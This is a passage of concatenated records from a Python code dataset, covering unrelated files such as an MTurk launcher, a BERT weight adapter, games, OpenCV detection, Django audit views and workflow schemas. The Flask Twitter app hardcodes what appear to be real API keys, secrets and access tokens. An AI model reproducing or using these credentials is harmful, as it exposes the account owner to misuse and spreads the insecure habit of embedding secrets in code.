xml_wrapper:\n\tsplit_xml_wrapper = xml_wrapper.read().split('LOCATION_FOR_VEGA_CODE')\n\tfor vega_file in os.listdir(vega_directory):\n\t\twith open (file=vega_directory + vega_file, mode='r') as vega:\n\t\t\tcontents = vega.read()\n\t\t\tspecs.append(split_xml_wrapper[0] + contents + split_xml_wrapper[1])\n\n# Loop through the different HIT's and launch each one\nwith open(file=hit_id_location, mode='w+') as hit_id_file:\n\tfor i in range(len(specs)):\n\t\tnew_hit = mturk.create_hit(\n\t \tTitle = 'Unique testing name (' + str(random.randint(1, 100000000)) + str(i) + ')',\n\t \tDescription = 'Answer our questions about visualization!',\n\t \tKeywords = 'text, quick, labeling',\n\t \tReward = '0.15',\n\t \tMaxAssignments = 100,\n\t \tLifetimeInSeconds = 172800,\n\t \tAssignmentDurationInSeconds = 600,\n\t \tAutoApprovalDelayInSeconds = 14400,\n\t \tQuestion = specs[i],\n\t\t)\t\n\n\t\t# These prints are not necessary, but are nice for testing in sandbox\n\t\tprint(\"A new HIT has been created. You can preview it here (\" + str(i) + \"):\")\n\t\tprint(\"https://workersandbox.mturk.com/mturk/preview?groupId=\" + new_hit['HIT']['HITGroupId'])\n\t\tprint(\"HITID = \" + new_hit['HIT']['HITId'] + \" (Use to Get Results)\")\t\n\n\t\t# Write the HIT id to a file so we can get the data back\n\t\thit_id_file.write(new_hit['HIT']['HITId'] + \"\\n\")\n\t\t","sub_path":"launch_hit.py","file_name":"launch_hit.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"639844463","text":"#!/usr/bin/env python\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n# Alex Dementsov\n# California Institute of Technology\n# (C) 2009 All Rights Reserved\n#\n# {LicenseText}\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n\n# Configuration parameters from INPUT_GIPAW.html file\n# First value is default value\n\n# Namelist: INPUTGIPAW\n\nnamelists = ('inputgipaw',)\ncards = ()\n\nnamelist_inputgipaw = ('job',\n 'prefix',\n 'tmp_dir',\n 'conv_threshold',\n 'isolve',\n 'q_gipaw',\n 'iverbosity',\n 'filcurr',\n 'filfield',\n 'read_recon_in_paratec_fmt',\n 'file_reconstruction',\n 'use_nmr_macroscopic_shape',\n 'nmr_macroscopic_shape(3,3)',\n 'spline_ps')\n\n\n__date__ = \"$Sep 2, 2009 11:51:30 AM$\"\n\n\n","sub_path":"espresso/tags/qecalc-0.2.1/build/lib/qecalc/qetask/qeparser/inputs/inputgipaw.py","file_name":"inputgipaw.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"318495424","text":"import json\nimport logging\nimport os\n\nimport tensorflow as tf\n\nfrom .abstract_adapter import AbstractAdapter, zip_weights\n\n\nclass BertAdapter(AbstractAdapter):\n\n def adapte_config(self, config_file, **kwrgs):\n with open(config_file, mode='rt', encoding='utf8') as fin:\n config = json.load(fin)\n\n model_config = {\n 'vocab_size': config['vocab_size'],\n 'activation': config['hidden_act'],\n 'max_positions': config['max_position_embeddings'],\n 'hidden_size': config['hidden_size'],\n 'type_vocab_size': config['type_vocab_size'],\n 'intermediate_size': config['intermediate_size'],\n 'hidden_dropout_rate': config['hidden_dropout_prob'],\n 'attention_dropout_rate': config['attention_probs_dropout_prob'],\n 'stddev': config['initializer_range'],\n 'num_layers': config['num_hidden_layers'],\n 'num_attention_heads': config['num_attention_heads'],\n }\n return model_config\n\n def adapte_weights(self, model, config, ckpt, **kwargs):\n # mapping weight names\n weights_mapping = self._mapping_weight_names(config['num_layers'])\n # zip weight names and values\n zipped_weights = zip_weights(\n model,\n ckpt,\n weights_mapping,\n verbose=kwargs.get('verbose', True))\n # set values to weights\n tf.keras.backend.batch_set_value(zipped_weights)\n\n def _mapping_weight_names(self, num_layers=12):\n mapping = {}\n\n # embedding\n mapping.update({\n 'bert/embedding/weight:0': 'bert/embeddings/word_embeddings',\n 'bert/embedding/token_type_embedding/embeddings:0': 'bert/embeddings/token_type_embeddings',\n 'bert/embedding/position_embedding/embeddings:0': 'bert/embeddings/position_embeddings',\n 'bert/embedding/layer_norm/gamma:0': 'bert/embeddings/LayerNorm/gamma',\n 'bert/embedding/layer_norm/beta:0': 'bert/embeddings/LayerNorm/beta',\n })\n\n # encoder\n model_prefix = 'bert/encoder/layer_{}'\n for i in range(num_layers):\n encoder_prefix = 'bert/encoder/layer_{}/'.format(i)\n # attention\n attention_prefix = encoder_prefix + 'attention/'\n for n in ['query', 'key', 'value']:\n for w in ['kernel', 'bias']:\n mapping[attention_prefix + n + '/' + w + ':0'] = attention_prefix + 'self/' + n + '/' + w\n #\n mapping[attention_prefix + 'dense/kernel:0'] = attention_prefix + 'output/dense/kernel'\n mapping[attention_prefix + 'dense/bias:0'] = attention_prefix + 'output/dense/bias'\n mapping[attention_prefix + 'layer_norm/gamma:0'] = attention_prefix + 'output/LayerNorm/gamma'\n mapping[attention_prefix + 'layer_norm/beta:0'] = attention_prefix + 'output/LayerNorm/beta'\n # intermediate\n intermediate_prefix = encoder_prefix + 'intermediate/'\n mapping[intermediate_prefix + 'dense/kernel:0'] = intermediate_prefix + 'dense/kernel'\n mapping[intermediate_prefix + 'dense/bias:0'] = intermediate_prefix + 'dense/bias'\n # output\n mapping[encoder_prefix + 'dense/kernel:0'] = encoder_prefix + 'output/dense/kernel'\n mapping[encoder_prefix + 'dense/bias:0'] = encoder_prefix + 'output/dense/bias'\n mapping[encoder_prefix + 'layer_norm/gamma:0'] = encoder_prefix + 'output/LayerNorm/gamma'\n mapping[encoder_prefix + 'layer_norm/beta:0'] = encoder_prefix + 'output/LayerNorm/beta'\n\n # pooler\n mapping['bert/pooler/dense/kernel:0'] = 'bert/pooler/dense/kernel'\n mapping['bert/pooler/dense/bias:0'] = 'bert/pooler/dense/bias'\n\n return mapping\n","sub_path":"transformers_keras/adapters/bert_adapter.py","file_name":"bert_adapter.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"609083410","text":"from coinbase.wallet.client import Client\nfrom coinbase.wallet.error import APIError\n\n\nclass CoinBase:\n\n def __init__(self, config):\n self.auth_client = Client(config['API_KEY'], config['SECRET'])\n\n def amount(self):\n try:\n account = self.auth_client.get_account(\n \"0ed05157-8cee-501a-bd7e-4fe2aa8d62b8\")\n return float(account['native_balance']['amount'])\n except APIError as err:\n raise err\n except KeyError as err:\n raise err\n except ValueError as err:\n raise err\n","sub_path":"coinbase_api.py","file_name":"coinbase_api.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"574589060","text":"# -*- coding: utf-8 -*-\n\"\"\"\n* @Author: ziuno\n* @Software: PyCharm\n* @Time: 2019/4/12 18:14\n\"\"\"\nfrom itertools import chain\n\n\nclass UAVMesh(object):\n def __init__(self, mesh):\n self.__mesh = mesh\n self.__vertexes = mesh.vertexes\n self.__edges = mesh.edges\n self.__faces = mesh.faces\n\n def __oxen_led(self):\n path = []\n half_edges = self.__vertex.half_edges.copy()\n while len(half_edges) != 0:\n half_edge = half_edges[0]\n face = half_edge.face\n if self.__faces.count(face) == 0:\n del half_edges[0]\n continue\n source_vertex = half_edge.source_vertex\n target_vertex = half_edge.target_vertex\n path.append(['oxen-led', self.__vertexes.index(source_vertex), self.__vertexes.index(target_vertex),\n self.__faces.index(face)])\n self.__faces.remove(face)\n self.__vertex = target_vertex\n half_edges = self.__vertex.half_edges.copy()\n return path\n\n def __jump_out(self):\n path = []\n source_vertex_index = self.__vertexes.index(self.__vertex)\n half_edges = [face.half_edges for face in self.__faces]\n half_edges = list(chain(*half_edges))\n target_vertex_indexes = [self.__vertexes.index(half_edge.target_vertex) for half_edge in half_edges]\n target_vertex_indexes = list(set(target_vertex_indexes))\n\n def get_map_dist(mesh):\n map = {}\n for vertex in mesh.vertexes:\n source_index = self.__vertexes.index(vertex)\n map[source_index] = {}\n half_edges = vertex.half_edges\n target_vertexes = [half_edge.target_vertex for half_edge in half_edges]\n target_indexes = [self.__vertexes.index(target_vertex) for target_vertex in target_vertexes]\n for targer_index in target_indexes:\n map[source_index][targer_index] = 1\n return map\n\n graph = get_map_dist(self.__mesh)\n\n def get_cost_dist(map, source):\n cost = {}\n can_go_s = map[source]\n for can_go in can_go_s:\n cost[can_go] = map[source][can_go]\n can_not_go_s = map.keys() - can_go_s\n for can_not_go in can_not_go_s:\n cost[can_not_go] = 999\n cost[source] = 0\n return cost\n\n cost = get_cost_dist(graph, source_vertex_index)\n visited = [source_vertex_index]\n parents = {}\n\n def findShorestNode(cost):\n minDist = 999\n node = None\n for i in graph.keys():\n if (cost[i] < minDist) & (i not in visited):\n minDist = cost[i]\n node = i\n return node\n\n node = findShorestNode(cost)\n while node:\n for i in graph[node]:\n newcost = cost[node] + graph[node][i]\n if newcost < cost[i]:\n parents[i] = node\n cost[i] = newcost\n visited.append(node)\n node = findShorestNode(cost)\n can_go_costs = []\n can_go_keys = graph[source_vertex_index].keys()\n for target_vertex_index in target_vertex_indexes:\n can_go_costs.append([cost[target_vertex_index], target_vertex_index])\n can_go_costs.sort()\n _, target_vertex_index = can_go_costs[0]\n tmp_path = [target_vertex_index]\n tmp_index = tmp_path[-1]\n while tmp_index not in can_go_keys:\n tmp_path.append(parents[tmp_index])\n tmp_index = tmp_path[-1]\n while len(tmp_path) != 0:\n target_vertex_index = tmp_path[-1]\n half_edges = self.__vertex.half_edges\n for half_edge in half_edges:\n index = self.__vertexes.index(half_edge.target_vertex)\n if index != target_vertex_index:\n continue\n path.append(['move', source_vertex_index, index])\n del tmp_path[-1]\n self.__vertex = half_edge.target_vertex\n source_vertex_index = index\n break\n return path\n\n def get_uav_path_from_vertex(self, vertex):\n path = []\n if self.__vertexes.count(vertex) == 0:\n raise ValueError('[error] the start vertex is not in the vertexes')\n vertex = self.__vertexes[self.__vertexes.index(vertex)]\n self.__vertex = vertex\n while len(self.__faces) != 0:\n path.append(self.__oxen_led())\n if len(self.__faces) == 0:\n break\n path.append(self.__jump_out())\n self.__faces = self.__mesh.faces.copy()\n return path\n","sub_path":"utils/UAVMesh.py","file_name":"UAVMesh.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"411946876","text":"import time\nlista=[ '''\n\n========= 1''','''\n\n| \n| \n| \n|\n|\n========= 2''','''\n+---+\n| \n| \n|\n|\n|\n========= 3''','''\n+---+\n| |\n| \n| \n| \n| \n========= 4''','''\n+---+\n| |\n| O\n| \n| \n| \n========= 5''','''\n+---+\n| |\n| O\n| |\n|\n|\n=========6''','''\n+---+\n| |\n| O\n| /|\n| \n| \n=========7''','''\n+---+\n| |\n| O\n| /|\\\n| \n| \n========= 8''','''\n+---+\n| |\n| O\n| /|\\\n| / \n| \n========= 9''','''\n+---+\n| |\n| O\n| /|\\\n| / \\\n| \n========= 10''']\nnombre=input(\"como te llamas \")\nprint(\"hola, \"+nombre,\" es hora de jugar\")\nprint(\" \")\ntime.sleep(1)\nprint(\"comienza a adivinar\")\ntime.sleep(0.5)\npalabra=\"murcielago\"\ntupalabra=\" \"\nvidas=10\n\nwhile vidas > 0:\n fallas=0\n for letra in palabra:\n if letra in tupalabra:\n print(letra,end=\"\")\n else:\n print(\"*\",end=\"\")\n fallas+=1\n \n if fallas==0:\n input()\n print(\"\")\n print(\"felicidades, ganaste\")\n input()\n break\n\n tuletra=input(\"introduce una letra: \")\n tupalabra+=tuletra\n\n\n \n if tuletra not in palabra:\n vidas-=1\n if vidas==9:\n print (lista[0])\n if vidas==8:\n print(lista[1])\n if vidas==7:\n print(lista[2])\n if vidas==2:\n print(lista[3])\n if vidas==6:\n print(lista[4])\n if vidas==5:\n print(lista[5])\n if vidas==4:\n print(lista[6])\n if vidas==3:\n print(lista[7])\n if vidas==2:\n print(lista[8])\n if vidas==1:\n print(lista[9])\n if vidas== 0:\n print(lista[-1])\n print(\"perdiste!\")\n ganado=1\nelse:\n input()\n print(\"gracias por participar\")\n input()\n \n","sub_path":"your-project/prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"141618622","text":"\"\"\"\nThis function detects the circular features on a car model\n\nModificatoin: Since the function SimpleBlobDetector_create() takes a long\ntime to run, multiprocessing is applied to increase the speed.\n\nAuthor: Xu Yang\nABB\n\nModified by: Siqi Dai\n\"\"\"\n\n\nimport cv2\nfrom multiprocessing.pool import ThreadPool\n\n\ndef feature_detection(image, min_area, max_area):\n Param_bright = cv2.SimpleBlobDetector_Params()\n Param_dark = cv2.SimpleBlobDetector_Params()\n\n # parameter settings\n Param_bright.filterByColor = Param_dark.filterByColor = True\n Param_bright.blobColor = 255\n Param_dark.blobColor = 0\n\n Param_bright.minThreshold = Param_dark.minThreshold = 50\n Param_bright.maxThreshold = Param_dark.maxThreshold = 255\n Param_bright.thresholdStep = Param_dark.thresholdStep = 2\n\n Param_bright.filterByArea = Param_dark.filterByArea = True\n Param_bright.minArea = Param_dark.minArea = min_area # low image quality: 90, high image quality: 600\n Param_bright.maxArea = Param_dark.maxArea = max_area # low image quality: 1000, high image quality: 6000\n\n Param_bright.filterByCircularity = Param_dark.filterByCircularity = True\n Param_bright.minCircularity = Param_dark.minCircularity = 0.7\n\n # construct detectors for dark blob and bright blob\n # use multiprocessing\n pool2 = ThreadPool(processes=2)\n async_res_bright2 = pool2.apply_async(cv2.SimpleBlobDetector_create,(Param_bright,))\n async_res_dark2 = pool2.apply_async(cv2.SimpleBlobDetector_create,(Param_dark,))\n detector_bright = async_res_bright2.get()\n detector_dark = async_res_dark2.get()\n\n # use multiprocessing to speed up\n pool = ThreadPool(processes=4)\n async_res_dark = pool.apply_async(detector_dark.detect,(image,))\n async_res_bright = pool.apply_async(detector_bright.detect,(image,))\n keypoints_dark = async_res_dark.get()\n keypoints_bright = async_res_bright.get()\n keypoints = keypoints_bright + keypoints_dark\n\n return keypoints\n","sub_path":"feature_detection.py","file_name":"feature_detection.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"195594301","text":"from flask import Flask, render_template, request\nfrom flask_tweepy import Tweepy\nfrom pi import MyStreamListener, Steann\nfrom textblob import TextBlob\nimport sqlite3\n\nc_key = \"1Va9E6ca4zb43q9JWf8mfZafc\"\nc_secret = \"9tg89S9VcKf9AzfZh9CeMrsT8TjnbJN43RyTOxUX6uuddduE4W\"\n\na_token = \"114579331-2Yg0Cni9ecvmiXW3xSAMtxb3SUzBCeokTDR4n7qV\"\na_secret = \"WTnmBbrkqNFPhVH9EHirwR1Q8og0Ef3QVZabSZuwcZWrz\"\napp = Flask(__name__)\napp.config.setdefault('TWEEPY_CONSUMER_KEY', c_key)\napp.config.setdefault('TWEEPY_CONSUMER_SECRET', c_secret)\napp.config.setdefault('TWEEPY_ACCESS_TOKEN_KEY', a_token)\napp.config.setdefault('TWEEPY_ACCESS_TOKEN_SECRET', a_secret)\n\ntweepy = Tweepy(app)\n\ntopix = []\nwith sqlite3.connect(\"Twitter_data.db\") as connection:\n\tc = connection.cursor()\n\tc.execute(\"CREATE TABLE IF NOT EXISTS TrackData (Username TEXT, Sent TEXT, Message TEXT)\")\n\n\n@app.route(\"/\", methods=['POST', 'GET'])\ndef hello():\n return render_template('index.html')\n\n\n@app.route(\"/result\", methods=[\"POST\", \"GET\"])\ndef show_result():\n\tnames = []\n\tblobase = []\n\tpolars = []\n\tif request.method == \"POST\":\n\t\tresult = request.form['topic']\n\t\ttweetl = tweepy.api.search(q=result, lang='en', show_user=True)\n\t\tfor o in tweetl:\n\t\t\tnames.append(o.user.screen_name)\n\t\t\tblobase.append(o.text)\n\t\t\tpolars.append(TextBlob(o.text).sentiment.polarity)\n\t\tlinkval = zip(names, blobase, polars)\n\t\treturn render_template('result.html', topics=linkval)\n\n\n@app.route('/tweets', methods=['POST', 'GET'])\ndef show_tweets():\n\ttopix = request.form['qtops'].encode('utf-8').split()\n\tif request.method == \"POST\":\n\t\tmms = MyStreamListener()\n\t\tmystream = Steann(auth=tweepy.api.auth, listener=mms)\n\t\tmystream.filter(track=topix)\n\t\tmoom = mystream.disconnect()\n\treturn render_template('tweets.html', user=moom)\n\n\n@app.route('/news')\ndef news():\n\tnewtwt = tweepy.api.home_timeline()\n\treturn render_template('news.html', new=newtwt)\n\n\n@app.route('/id-finder', methods=[\"GET\", \"POST\"])\ndef id_finder():\n\tfound_ID = None\n\terror_message = None\n\tif request.method == \"POST\":\n\t\ttry:\n\t\t\tfound_name = request.form['inputSmall']\n\t\t\tgotten_user = tweepy.api.get_user(found_name)\n\t\t\tfound_ID = gotten_user.id\n\t\texcept Exception as e:\n\t\t\terror_message = e\n\treturn render_template('finder.html', twitID=found_ID, errno=error_message)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"16500222","text":"import argparse\nimport torchvision.transforms as transforms\nfrom PIL import Image\nimport numpy as np\nimport scipy.ndimage as pyimg\nimport random\nimport os\n\nimport utils\n\ndef parse_args():\n\tdesc = \"Convert an image to be used for training\" \n\tparser = argparse.ArgumentParser(description=desc)\n\n\tparser.add_argument('--image', type=str,\n\t\tdefault=None,\n\t\thelp='Directory path to the image. (default: %(default)s)')\n\n\tparser.add_argument('--image_mask', type=str,\n\t\tdefault=None,\n\t\thelp='Directory path to the image mask. (default: %(default)s)')\n\n\tparser.add_argument('--max_height', type=int, \n\t\tdefault=None,\n\t\thelp='Maximum height of the output images. (default: %(default)s)')\n\n\n\targs = parser.parse_args()\n\treturn args\n\ndef resize(image, max = None):\n\tw,h = image.size\n\tr = w/h\n\tif max is not None:\n\t\tdim = (int(r*max), max)\n\t\timage = image.resize(dim)\n\n\t# return the resized image\n\treturn image\n\ndef main():\n\tglobal args\n\targs = parse_args()\n\tfilename = os.path.splitext(os.path.basename(args.image))[0]\n\tmask_filename = os.path.splitext(os.path.basename(args.image_mask))[0]\n\n\timg = Image.open(args.image)\n\n\tif args.max_height is not None:\n\t\timg = resize(img,args.max_height)\n\t\tprocessed_mask = resize(utils.text_image_preprocessing(args.image_mask),args.max_height)\n\telse:\n\t\tprocessed_mask = utils.text_image_preprocessing(args.image_mask)\n\n\tprocessed_mask.save(os.path.join('../data/style',mask_filename+'_processed.png'))\n\n\tdst = Image.new('RGB', (img.width + img.width, img.height))\n\tdst.paste(img, (img.width, 0))\n\tdst.paste(processed_mask, (0, 0))\n\tdst.save(os.path.join('../data/style',filename+'.png'))\n\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"68534698","text":"import dwave_networkx as dnx\nimport networkx as nx\nimport dimod\n\n# Use basic simulated annealer\nsampler = dimod.SimulatedAnnealingSampler()\n\n# Set up a Networkx Graph\nG = nx.Graph()\nG.add_edges_from([(0, 1), (0, 2), (1, 2), (1, 3), (2, 3), (1, 4), (2, 4), (3, 4), (3, 5), (4, 5), (5, 2)])\n\n# Get the max cut\ncandidate = dnx.maximum_cut(G, sampler)\nif len(candidate) == 3:\n print (candidate, \" is the right length\")\nelse:\n print (candidate, \" is not the right length\")\n","sub_path":"dwave_networkx/examples/max_cut.py","file_name":"max_cut.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"457084769","text":"#asking for a guess\nprint(\"Hello Pal, Whats your name?\")\nname = input(\">\")\nprint(\"Well\", name, \"I was thinkling in a game between 1 to 20. Can you guess?\")\nimport random\nsecretNumber = random.randint(1, 20)\n\nfor guessesTaken in range(1, 7):\n try:\n print(\"take a guess:\")\n guess = int(input(\">\"))\n except:\n print(\"please add an integer\")\n continue\n \n if guess < secretNumber:\n print(\"your guess is too low\")\n elif guess > secretNumber:\n print(\"your guess is too high\")\n elif guess != int(secretNumber):\n print(\"Sorry you took too many guesses\")\n else:\n break #this condition is for the good guess.\n \ntry: \n if guess == secretNumber:\n print(\"Good Job!\", name)\n print(\"you guess my number in\", str(guessesTaken), \"guesses\") \n else: \n print(\"Sorry you took too many guesses\")\n print(\"the number I was thinking of was\", str(secretNumber)) \nexcept:\n quit()","sub_path":"guessingNumber.py","file_name":"guessingNumber.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"69807934","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTencentBlueKing is pleased to support the open source community by making 蓝鲸智云-用户管理(Bk-User) available.\nCopyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.\nLicensed under the MIT License (the \"License\"); you may not use this file except in compliance with the License.\nYou may obtain a copy of the License at http://opensource.org/licenses/MIT\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on\nan \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the\nspecific language governing permissions and limitations under the License.\n\"\"\"\nimport logging\nimport math\n\nimport bkuser_sdk\nfrom bkuser_shell.audit import serializers\nfrom bkuser_shell.audit.constants import OPERATION_OBJ_VALUE_MAP, OPERATION_VALUE_MAP\nfrom bkuser_shell.bkiam.constants import ActionEnum\nfrom bkuser_shell.common.error_codes import error_codes\nfrom bkuser_shell.common.export import ProfileExcelExporter\nfrom bkuser_shell.common.viewset import BkUserApiViewSet\nfrom django.conf import settings\nfrom django.utils.timezone import make_aware\nfrom openpyxl import load_workbook\n\nfrom bkuser_global.drf_crown import ResponseParams, inject_serializer\nfrom bkuser_global.utils import get_timezone_offset\n\nlogger = logging.getLogger(__name__)\n\n\nclass AuditLogViewSet(BkUserApiViewSet):\n ACTION_ID = ActionEnum.VIEW_AUDIT.value\n\n def _get_categories_map(self, request) -> dict:\n \"\"\"Get categories id map\"\"\"\n api_instance = bkuser_sdk.CategoriesApi(self.get_api_client_by_request(request, no_auth=True))\n categories = self.get_paging_results(api_instance.v2_categories_list)\n\n return {x[\"id\"]: x for x in categories}\n\n @staticmethod\n def _get_request_params(validated_data: dict) -> dict:\n \"\"\"Get params from validated_data\"\"\"\n\n # 前端传的是零时区时间,需要统一成当前时区的时间\n target_start_time = make_aware(validated_data[\"start_time\"] + get_timezone_offset())\n target_end_time = make_aware(validated_data[\"end_time\"] + get_timezone_offset())\n\n params = {\n \"since\": target_start_time,\n \"until\": target_end_time,\n \"page\": validated_data[\"page\"],\n \"page_size\": validated_data[\"page_size\"],\n }\n return params\n\n\nclass GeneralLogViewSet(AuditLogViewSet):\n @inject_serializer(\n query_in=serializers.GeneralLogListReqeustSerializer,\n out=serializers.OperationLogRespSLZ,\n tags=[\"audit\"],\n )\n def list(self, request, validated_data: dict):\n categories = self._get_categories_map(request)\n api_instance = bkuser_sdk.AuditApi(self.get_api_client_by_request(request))\n\n params = self._get_request_params(validated_data)\n keyword = validated_data.get(\"keyword\")\n if keyword:\n for m in [OPERATION_OBJ_VALUE_MAP, OPERATION_VALUE_MAP]:\n keyword = m.get(keyword, keyword)\n\n params.update(\n {\n \"wildcard_search\": keyword.encode(\"unicode-escape\"),\n \"wildcard_search_fields\": [\"extra_value\", \"operator\"],\n }\n )\n\n return ResponseParams(\n api_instance.v2_audit_general_log_list(**params),\n {\"context\": {\"categories\": categories}},\n )\n\n\nclass LoginLogViewSet(AuditLogViewSet):\n @inject_serializer(\n query_in=serializers.LoginLogListReqeustSerializer,\n out=serializers.LoginLogRespSLZ,\n tags=[\"audit\"],\n )\n def list(self, request, validated_data: dict):\n categories = self._get_categories_map(request)\n api_instance = bkuser_sdk.AuditApi(self.get_api_client_by_request(request))\n\n params = self._get_request_params(validated_data)\n return ResponseParams(api_instance.v2_audit_login_log_list(**params), {\"context\": {\"categories\": categories}})\n\n @inject_serializer(query_in=serializers.LoginLogListReqeustSerializer, tags=[\"audit\"])\n def export(self, request, validated_data: dict):\n \"\"\"导出登录日志\"\"\"\n api_instance = bkuser_sdk.AuditApi(self.get_api_client_by_request(request))\n profile_api_instance = bkuser_sdk.ProfilesApi(self.get_api_client_by_request(request))\n fields_api_instance = bkuser_sdk.DynamicFieldsApi(self.get_api_client_by_request(request))\n\n params = self._get_request_params(validated_data)\n login_logs = self.get_paging_results(\n api_instance.v2_audit_login_log_list, since=params[\"since\"], until=params[\"until\"]\n )\n if not login_logs:\n raise error_codes.CANNOT_EXPORT_EMPTY_LOG\n\n fields = self.get_paging_results(fields_api_instance.v2_dynamic_fields_list)\n fields.append(\n bkuser_sdk.DynamicFields(name=\"create_time\", display_name=\"登录时间\", type=\"timer\", order=0).to_dict()\n )\n\n exporter = ProfileExcelExporter(\n load_workbook(settings.EXPORT_LOGIN_TEMPLATE), settings.EXPORT_EXCEL_FILENAME, fields, 1\n )\n\n # TODO: remove step when #88 is done\n step = 300\n profile_ids = list({x[\"profile_id\"] for x in login_logs})\n profiles = []\n counts = math.ceil(len(profile_ids) / step)\n for _c in range(counts):\n profiles.extend(\n self.get_paging_results(\n profile_api_instance.v2_profiles_list,\n lookup_field=\"id\",\n exact_lookups=profile_ids[_c * step : (_c + 1) * step],\n include_disabled=True,\n )\n )\n\n extra_info = {x[\"profile_id\"]: x for x in login_logs}\n exporter.update_profiles(profiles, extra_info)\n\n return exporter.to_response()\n","sub_path":"src/saas/bkuser_shell/audit/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"409576473","text":"\"\"\"\nA collection of schemas which represent elements of a property calculation workflow.\n\"\"\"\nimport re\n\nfrom propertyestimator.utils.quantities import EstimatedQuantity\nfrom propertyestimator.utils.serialization import TypedBaseModel\nfrom propertyestimator.workflow.plugins import available_protocols\nfrom propertyestimator.workflow.utils import ProtocolPath, ReplicatorValue\n\n\nclass ProtocolSchema(TypedBaseModel):\n \"\"\"A json serializable representation of a workflow protocol.\n \"\"\"\n\n def __init__(self):\n \"\"\"Constructs a new ProtocolSchema object.\n \"\"\"\n self.id = None\n self.type = None\n\n self.inputs = {}\n\n def __getstate__(self):\n\n return {\n 'id': self.id,\n 'type': self.type,\n\n 'inputs': self.inputs\n }\n\n def __setstate__(self, state):\n\n self.id = state['id']\n self.type = state['type']\n\n self.inputs = state['inputs']\n\n\nclass ProtocolGroupSchema(ProtocolSchema):\n \"\"\"A json serializable representation of a workflow protocol\n group.\n \"\"\"\n\n def __init__(self):\n \"\"\"Constructs a new ProtocolGroupSchema object.\n \"\"\"\n super().__init__()\n\n self.grouped_protocol_schemas = []\n\n def __getstate__(self):\n\n state = super(ProtocolGroupSchema, self).__getstate__()\n state.update({\n 'grouped_protocol_schemas': self.grouped_protocol_schemas,\n })\n\n return state\n\n def __setstate__(self, state):\n\n super(ProtocolGroupSchema, self).__setstate__(state)\n self.grouped_protocol_schemas = state['grouped_protocol_schemas']\n\n\nclass ProtocolReplicator(TypedBaseModel):\n \"\"\"A protocol replicator contains the information necessary to replicate\n parts of a property estimation workflow.\n\n The protocols referenced by `protocols_to_replicate` will be cloned for\n each value present in `template_values`. Protocols that are being replicated\n will also have any ReplicatorValue inputs replaced with the actual value.\n\n Each of the protocols referenced in the `protocols_to_replicate` must have an id\n which contains the '$(id_index)' string (e.g component_$(id_index)_build_coordinates)\n where here *`id` is the id of the replicator* - when the protocol is replicated, $(id_index)\n will be replaced by the protocols actual index, which corresponds to a value in the\n `template_values` array.\n\n Any protocols which take input from a replicated protocol will be updated to\n instead take a list of value, populated by the outputs of the replicated\n protocols.\n\n Notes\n -----\n * The protocols referenced to by `template_targets` **must not** be protocols\n which are being replicated.\n * The `template_values` property must be a list of either constant values,\n or :obj:`ProtocolPath`'s which take their value from the `global` scope.\n \"\"\"\n\n def __init__(self, replicator_id=''):\n \"\"\"Constructs a new ProtocolReplicator object.\n\n Parameters\n ----------\n replicator_id: str\n The id of this replicator.\n \"\"\"\n self.id = replicator_id\n\n self.protocols_to_replicate = []\n self.template_values = None\n\n def __getstate__(self):\n\n return {\n 'id': self.id,\n\n 'protocols_to_replicate': self.protocols_to_replicate,\n 'template_values': self.template_values\n }\n\n def __setstate__(self, state):\n\n self.id = state['id']\n\n self.protocols_to_replicate = state['protocols_to_replicate']\n self.template_values = state['template_values']\n\n def replicates_protocol_or_child(self, protocol_path):\n \"\"\"Returns whether the protocol pointed to by `protocol_path` (or\n any of its children) will be replicated by this replicator.\"\"\"\n\n for path_to_replace in self.protocols_to_replicate:\n\n if path_to_replace.full_path.find(protocol_path.start_protocol) < 0:\n continue\n\n return True\n\n return False\n\n\nclass WorkflowOutputToStore:\n \"\"\"An object which describes which data should be cached\n after a workflow has finished executing, and from which\n completed protocols should the data be collected from.\n \"\"\"\n\n def __init__(self):\n \"\"\"Constructs a new WorkflowOutputToStore object.\"\"\"\n\n self.substance = None\n\n self.trajectory_file_path = None\n 